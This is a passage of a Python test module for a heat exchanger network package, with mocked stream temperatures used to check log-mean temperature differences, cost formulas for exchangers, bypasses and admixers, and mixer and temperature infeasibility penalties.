temperature_difference_2 = test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case]
if temperature_difference_1 == temperature_difference_2:
logarithmic_mean_temperature_difference = temperature_difference_1
else:
logarithmic_mean_temperature_difference = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
assert abs(logarithmic_mean_temperature_difference - test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case]) <= 10e-3
def test_admixer_cold_stream():
test_exchanger, test_case, _, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_cold']
test_parameter.heat_loads[:, :] = 2000
for operating_case in test_case.range_operating_cases:
assert test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case]
assert test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case]
assert test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
if operating_case == 0:
assert test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
elif operating_case == 1:
assert abs(test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] - (test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case] + test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case] * test_exchanger.operation_parameter.mixer_fractions_cold_stream[operating_case]) / (1 + test_exchanger.operation_parameter.mixer_fractions_cold_stream[operating_case])) <= 10e-3
temperature_difference_1 = test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case]
temperature_difference_2 = test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case]
if temperature_difference_1 == temperature_difference_2:
logarithmic_mean_temperature_difference = temperature_difference_1
else:
logarithmic_mean_temperature_difference = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
assert abs(logarithmic_mean_temperature_difference - test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case]) <= 10e-3
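# The four mixer tests above all recompute the log-mean temperature
# difference inline. A small reference helper capturing that formula
# (an illustrative sketch for this test module, not part of the code
# under test; the name reference_lmtd is hypothetical) would be:
import math


def reference_lmtd(temperature_difference_1, temperature_difference_2):
    """Log-mean temperature difference; degenerates to the common value
    when both terminal differences are equal (avoids log(1) / 0)."""
    if temperature_difference_1 == temperature_difference_2:
        return temperature_difference_1
    return (temperature_difference_1 - temperature_difference_2) / math.log(temperature_difference_1 / temperature_difference_2)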
def test_costs_coefficients():
test_exchanger, test_case, _, _ = setup_module()
base_costs = test_case.initial_exchanger_address_matrix['c_0_HEX'][0]
assert base_costs == test_exchanger.costs.base_costs
specific_area_costs = test_case.initial_exchanger_address_matrix['c_A_HEX'][0]
assert specific_area_costs == test_exchanger.costs.specific_area_costs
degression_area = test_case.initial_exchanger_address_matrix['d_f_HEX'][0]
assert degression_area == test_exchanger.costs.degression_area
remove_costs = test_case.initial_exchanger_address_matrix['c_R_HEX'][0]
assert remove_costs == test_exchanger.costs.remove_costs
base_split_costs = test_case.initial_exchanger_address_matrix['c_0_split'][0]
assert base_split_costs == test_exchanger.costs.base_split_costs
specific_split_costs = test_case.initial_exchanger_address_matrix['c_M_split'][0]
assert specific_split_costs == test_exchanger.costs.specific_split_costs
degression_split = test_case.initial_exchanger_address_matrix['d_f_split'][0]
assert degression_split == test_exchanger.costs.degression_split
remove_split_costs = test_case.initial_exchanger_address_matrix['c_R_split'][0]
assert remove_split_costs == test_exchanger.costs.remove_split_costs
base_bypass_costs = test_case.initial_exchanger_address_matrix['c_0_bypass'][0]
assert base_bypass_costs == test_exchanger.costs.base_bypass_costs
specific_bypass_costs = test_case.initial_exchanger_address_matrix['c_M_bypass'][0]
assert specific_bypass_costs == test_exchanger.costs.specific_bypass_costs
degression_bypass = test_case.initial_exchanger_address_matrix['d_f_bypass'][0]
assert degression_bypass == test_exchanger.costs.degression_bypass
remove_bypass_costs = test_case.initial_exchanger_address_matrix['c_R_bypass'][0]
assert remove_bypass_costs == test_exchanger.costs.remove_bypass_costs
base_admixer_costs = test_case.initial_exchanger_address_matrix['c_0_admixer'][0]
assert base_admixer_costs == test_exchanger.costs.base_admixer_costs
specific_admixer_costs = test_case.initial_exchanger_address_matrix['c_M_admixer'][0]
assert specific_admixer_costs == test_exchanger.costs.specific_admixer_costs
degression_admixer = test_case.initial_exchanger_address_matrix['d_f_admixer'][0]
assert degression_admixer == test_exchanger.costs.degression_admixer
remove_admixer_costs = test_case.initial_exchanger_address_matrix['c_R_admixer'][0]
assert remove_admixer_costs == test_exchanger.costs.remove_admixer_costs
base_repipe_costs = test_case.initial_exchanger_address_matrix['c_0_repipe'][0]
assert base_repipe_costs == test_exchanger.costs.base_repipe_costs
specific_repipe_costs = test_case.initial_exchanger_address_matrix['c_M_repipe'][0]
assert specific_repipe_costs == test_exchanger.costs.specific_repipe_costs
degression_repipe = test_case.initial_exchanger_address_matrix['d_f_repipe'][0]
assert degression_repipe == test_exchanger.costs.degression_repipe
base_resequence_costs = test_case.initial_exchanger_address_matrix['c_0_resequence'][0]
assert base_resequence_costs == test_exchanger.costs.base_resequence_costs
specific_resequence_costs = test_case.initial_exchanger_address_matrix['c_M_resequence'][0]
assert specific_resequence_costs == test_exchanger.costs.specific_resequence_costs
degression_resequence = test_case.initial_exchanger_address_matrix['d_f_resequence'][0]
assert degression_resequence == test_exchanger.costs.degression_resequence
def test_heat_exchanger_costs():
test_exchanger, test_case, test_addresses, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
test_parameter.heat_loads[:, :] = 5000
exchanger_costs = test_exchanger.costs.base_costs + test_exchanger.costs.specific_area_costs * (test_exchanger.operation_parameter.area - test_exchanger.operation_parameter.initial_area)**test_exchanger.costs.degression_area
assert exchanger_costs == test_exchanger.exchanger_costs
for operating_case in test_case.range_operating_cases:
test_parameter.heat_loads[:, operating_case] = 5000 * 10e-2
assert test_exchanger.exchanger_costs == 0
test_addresses.matrix[0, 7] = False
assert test_exchanger.exchanger_costs == test_exchanger.costs.remove_costs
test_exchanger_5 = HeatExchanger(test_addresses, test_parameter, test_case, 5)
test_addresses.matrix[5, 7] = True
test_parameter.heat_loads[:, :] = 5000
exchanger_costs_5 = test_exchanger_5.costs.base_costs + test_exchanger_5.costs.specific_area_costs * (test_exchanger_5.operation_parameter.area - test_exchanger_5.operation_parameter.initial_area)**test_exchanger_5.costs.degression_area
assert exchanger_costs_5 == test_exchanger_5.exchanger_costs
test_addresses.matrix[5, 7] = False
assert test_exchanger_5.exchanger_costs == 0
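# test_heat_exchanger_costs above asserts the degression cost law
# base + specific * (area - initial_area) ** degression, with zero cost
# when no additional area is required. A standalone sketch of that
# relation (illustrative only; the function name and the zero-cost
# branch are assumptions inferred from the assertions above):
def reference_exchanger_costs(base_costs, specific_area_costs, area, initial_area, degression_area):
    """Degression cost law mirrored by the assertions above."""
    if area <= initial_area:
        # No additional area needed -> no investment costs (assumption).
        return 0.0
    return base_costs + specific_area_costs * (area - initial_area) ** degression_area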
def test_admixer_costs():
test_exchanger, _, addresses, _ = setup_module()
addresses.matrix[0, 4] = True
addresses.matrix[0, 6] = True
assert test_exchanger.admixer_costs == test_exchanger.costs.base_admixer_costs * 2
addresses.matrix[0, 4] = False
addresses.matrix[0, 6] = True
assert test_exchanger.admixer_costs == test_exchanger.costs.base_admixer_costs + test_exchanger.costs.remove_admixer_costs
addresses.matrix[0, 4] = False
addresses.matrix[0, 6] = False
assert test_exchanger.admixer_costs == 0
addresses.matrix[0, 4] = True
addresses.matrix[0, 6] = False
assert test_exchanger.admixer_costs == test_exchanger.costs.base_admixer_costs
def test_bypass_costs():
test_exchanger, _, addresses, _ = setup_module()
addresses.matrix[0, 3] = True
addresses.matrix[0, 5] = False
assert test_exchanger.bypass_costs == 0
addresses.matrix[0, 3] = False
addresses.matrix[0, 5] = True
assert test_exchanger.bypass_costs == test_exchanger.costs.remove_bypass_costs + test_exchanger.costs.base_bypass_costs
addresses.matrix[0, 3] = False
addresses.matrix[0, 5] = False
assert test_exchanger.bypass_costs == test_exchanger.costs.remove_bypass_costs
addresses.matrix[0, 3] = True
addresses.matrix[0, 5] = True
assert test_exchanger.bypass_costs == test_exchanger.costs.base_bypass_costs
def test_infeasibility_temperature_differences():
test_exchanger, test_case, test_addresses, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 300]
mock_property_7.return_value = [400, 200]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_temperature_differences[0]
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 300]
mock_property_7.return_value = [400, 350]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_temperature_differences[0]
assert test_exchanger.infeasibility_temperature_differences[1] == (0 - np.sum(1))**2
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 300]
mock_property_7.return_value = [600, 200]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_temperature_differences[0]
assert test_exchanger.infeasibility_temperature_differences[1] == (0 - np.sum(1))**2
def test_infeasibility_mixer():
test_exchanger, test_case, test_addresses, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 274]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == 0
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 268]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == (0 - np.sum(1))**2
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_hot']
mock_property_6.return_value = [500, 10]
mock_property_7.return_value = [500, 1]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == 0
# 'admixer_hot' on the second operating case: outlet 10 above inlet 1, expect infeasible (quadratic penalty)
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_hot']
mock_property_6.return_value = [500, 1]
mock_property_7.return_value = [500, 10]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == (0 - np.sum(1))**2
# 'bypass_cold' on the second operating case: outlet 1 below the cold-stream temperature after the HEX, expect feasible
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_6:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_cold']
mock_property_6.return_value = [500, 1]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == 0
# 'bypass_cold' on the second operating case: outlet 1600 above the cold-stream temperature after the HEX, expect infeasible
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_6:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_cold']
mock_property_6.return_value = [500, 1600]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == (0 - np.sum(1))**2
# 'admixer_cold' on the second operating case: outlet 100 above inlet 10, expect feasible
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_cold']
mock_property_6.return_value = [500, 10]
mock_property_7.return_value = [500, 100]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == 0
# 'admixer_cold' on the second operating case: inlet 110 above outlet 10, expect infeasible
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
